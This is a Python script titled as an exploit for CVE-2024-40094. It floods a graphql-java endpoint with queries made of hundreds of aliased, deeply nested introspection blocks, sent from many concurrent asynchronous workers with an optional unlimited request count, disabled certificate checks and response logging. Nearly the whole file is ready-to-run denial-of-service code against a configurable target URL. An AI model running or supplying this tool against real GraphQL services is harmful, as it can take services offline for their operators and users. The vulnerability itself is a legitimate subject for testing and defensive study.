# CVE-2024-40094 exploit # ExecutableNormalizedFields (ENF) import argparse import asyncio import logging import aiohttp import time import urllib3 from typing import Dict, Optional # Disable SSL verification warnings if using self-signed certificates urllib3.disable_warnings(category=urllib3.exceptions.InsecureRequestWarning) # Default configuration DEFAULT_URL = "https://api.example.com/graphql" DEFAULT_HEADERS = { "Host": "api.example.com", "Authorization": "Bearer ", "Content-Type": "application/json", } # Number of concurrent jobs (similar to threads) # Each job will be a coroutine # Use a conservative default to avoid overwhelming the target by accident. DEFAULT_JOB_COUNT = 50 # Number of repeated alias blocks in the query (depth of stress on the server) DEFAULT_ALIAS_COUNT = 500 # Delay between requests (in seconds) DEFAULT_REQUEST_DELAY = 0.0 # Maximum number of requests each job sends (for clean shutdown) # Set to None for an unlimited number of requests DEFAULT_MAX_REQUESTS_PER_JOB = 1000 # Optional log file for recording outputs LOG_FILE = "enf_attack_async.log" # Logger used by workers logger = logging.getLogger(__name__) def build_enf_query(alias_count: int) -> str: """ Build a large introspection-based query with repeated aliases to potentially trigger ENF-based denial of service in vulnerable graphql-java. We'll nest ~5-7 levels, but you can push it deeper if needed. """ nested_block = """ __schema { types { name fields { name type { name fields { name type { name fields { name } } } } } } } """ alias_parts = [] for i in range(1, alias_count + 1): alias_parts.append(f"alias{i}:{nested_block}") return f""" query ENF_Exploit {{ {''.join(alias_parts)} }} """ async def worker( session: aiohttp.ClientSession, worker_id: int, semaphore: asyncio.BoundedSemaphore, url: str, alias_count: int, request_delay: float, max_requests: Optional[int], ) -> None: """ An asynchronous job that sends sequential requests to the server until it reaches the max_requests limit or the program is stopped. """ requests_sent = 0 while True: # If we have a maximum request limit, stop once it's reached if max_requests is not None and requests_sent >= max_requests: logger.info("[Worker-%d] Max requests reached. Stopping...", worker_id) break query = build_enf_query(alias_count) start_time = time.time() try: await semaphore.acquire() try: # Send the request with the GraphQL query as JSON async with session.post(url, json={"query": query}, ssl=False) as resp: status_code = resp.status text = await resp.text() length_resp = len(text) snippet = text[:200].replace("\n", " ") elapsed = time.time() - start_time msg = ( f"[Worker-{worker_id}] Status: {status_code}, Len: {length_resp}, " f"Time: {elapsed:.2f}s, Snippet: {snippet}..." ) logger.info(msg) finally: semaphore.release() except Exception as e: logger.exception("[Worker-%d] Error: %s", worker_id, e) break requests_sent += 1 if request_delay > 0: await asyncio.sleep(request_delay) def configure_logging(log_level: str) -> None: """Configure root logger with a file handler and console output.""" level = getattr(logging, log_level.upper(), logging.INFO) logger.setLevel(level) formatter = logging.Formatter("%(asctime)s [%(levelname)s] %(message)s") file_handler = logging.FileHandler(LOG_FILE) file_handler.setFormatter(formatter) logger.addHandler(file_handler) console_handler = logging.StreamHandler() console_handler.setFormatter(formatter) logger.addHandler(console_handler) async def main( url: str, headers: Dict[str, str], job_count: int, alias_count: int, request_delay: float, max_requests: Optional[int], log_level: str, concurrency_limit: int, ) -> None: """ Launch all jobs (as coroutines), then wait for all jobs to complete. """ # It's recommended to use a single ClientSession # for optimized connection pooling configure_logging(log_level) semaphore = asyncio.BoundedSemaphore(concurrency_limit) async with aiohttp.ClientSession(headers=headers) as session: tasks = [] for i in range(job_count): tasks.append( asyncio.create_task( worker( session, i, semaphore, url, alias_count, request_delay, max_requests, ) ) ) # Wait for all tasks to complete await asyncio.gather(*tasks) def parse_args() -> argparse.Namespace: parser = argparse.ArgumentParser(description="CVE-2024-40094 exploit") parser.add_argument("--url", default=DEFAULT_URL, help="Target GraphQL API URL") parser.add_argument( "--header", action="append", default=[], help="Additional header in 'Key: Value' format. Can be specified multiple times.", ) parser.add_argument( "--job-count", type=int, default=DEFAULT_JOB_COUNT, help="Number of concurrent jobs to spawn.", ) parser.add_argument( "--alias-count", type=int, default=DEFAULT_ALIAS_COUNT, help="Number of repeated alias blocks in the query.", ) parser.add_argument( "--delay", type=float, default=DEFAULT_REQUEST_DELAY, help="Delay between requests in seconds.", ) parser.add_argument( "--max-requests", type=int, default=DEFAULT_MAX_REQUESTS_PER_JOB, help="Maximum number of requests each job sends (0 for unlimited).", ) parser.add_argument( "--log-level", default="INFO", help="Logging level (e.g., DEBUG, INFO, WARNING, ERROR, CRITICAL)", ) parser.add_argument( "--concurrency-limit", type=int, help="Maximum number of simultaneous requests allowed; defaults to --job-count.", ) args = parser.parse_args() # Build headers from defaults and CLI overrides headers: Dict[str, str] = dict(DEFAULT_HEADERS) for header in args.header: if ":" not in header: parser.error(f"Invalid header format: {header}") key, value = header.split(":", 1) headers[key.strip()] = value.strip() args.headers = headers if args.concurrency_limit is None: args.concurrency_limit = args.job_count if args.job_count > args.concurrency_limit: parser.error( f"--job-count ({args.job_count}) exceeds --concurrency-limit ({args.concurrency_limit})" ) if args.max_requests == 0: args.max_requests = None return args if __name__ == "__main__": args = parse_args() try: asyncio.run( main( args.url, args.headers, args.job_count, args.alias_count, args.delay, args.max_requests, args.log_level, args.concurrency_limit, ) ) except KeyboardInterrupt: logger.info("KeyboardInterrupt received. Shutting down...")